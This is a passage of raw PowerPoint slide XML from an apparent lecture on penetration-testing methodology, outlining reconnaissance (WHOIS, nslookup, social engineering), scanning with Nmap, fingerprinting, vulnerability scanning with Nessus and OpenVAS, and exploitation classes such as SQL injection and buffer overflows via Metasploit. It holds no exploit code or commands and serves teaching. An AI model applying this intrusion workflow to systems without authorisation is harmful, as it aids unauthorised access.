              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Gather Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Scan IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Fingerprinting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Identify vulnerable services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Exploit vulnerability (with care!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Fix problems ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto data 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{8784E8DB-512C-4B66-804B-4C56E8E3D6F4}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/5/2017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673781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numero diapositiva 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5894299B-5B63-40B1-B6D0-7E1F7247FE81}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Gathering Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Goal – Given a company’s name, determine information like: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>what IP address ranges they have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>WHOIS (arin.net …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Nslookup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>personal information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Social engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Google</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>we.register.it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto data 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{C3C2F9AC-B5E7-4487-B277-0BB95AA9EC56}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/5/2017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543699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numero diapositiva 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{67EFB3A3-0A9F-4B84-8701-931BD32E0D9E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Scan IP Addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Goal – Given a set of IP addresses, determine what services and Operating Systems each is running.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Nmap – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.nmap.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Gfi languard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto data 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{4B56570C-CC28-4A42-A032-4122BA6B06DF}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/5/2017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pic>
        <p:nvPicPr>
          <p:cNvPr id="14343" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="2971800"/>
            <a:ext cx="1600200" cy="857250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14344" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="3695700"/>
            <a:ext cx="1828800" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3592019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5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{75E196BB-966A-4A07-A821-1E229107B6DD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Fingerprinting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What web server is running?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What accounts have I found?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What services are running?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What OSes are running?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Who is logged in?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Is there available information on the web site?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto data 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0DC8508F-784C-4E70-980D-0D0EA0E78427}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/5/2017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460188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numero diapositiva 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1FF1B768-4AD6-4313-919F-E31CA42E7A57}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Identify Vulnerable Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16388" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Given a specific IP address and port, try to gain access to the machine. Report all known vulnerabilities for this target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Nessus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>OpenVAS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16389" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2428875" y="2895600"/>
            <a:ext cx="1028700" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto data 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9680DCA6-DC35-4537-9F96-65583D750AD9}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/5/2017</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pic>
        <p:nvPicPr>
          <p:cNvPr id="16392" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="4114800"/>
            <a:ext cx="2193925" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1466840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en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17412"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28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto data 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EDC3C2B5-FFD2-4CD6-9DF0-5CCC081AD7A0}"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D999C7AB-0C37-45F2-9A80-096ED3309355}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>35</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171754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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18436" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="39688" y="39688"/>
            <a:ext cx="9078912" cy="6792912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto data 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{BFDDA3DB-4E20-418D-B0BA-452D24C84B1D}"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239C7264-5F26-4DF9-83B9-906B0FA6EC6A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>36</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645277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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Exploit vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Try to exploit detected vulnerabilities, for example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Buffer overflow </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Heap overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Cross-site scripting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Metasploit is a framework that allows to test attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{77BE51F2-3444-4B61-8378-B15C59DAEC20}"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794BEFCE-EEC1-494D-8ACE-A6D0290E8CDA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>37</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109610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endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20484" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6848475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto data 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{DEDB1EF8-2215-4D94-9DFC-6E2FAAA7132A}"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3C0F01AD-577F-4558-9A60-155C7BB9ED91}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
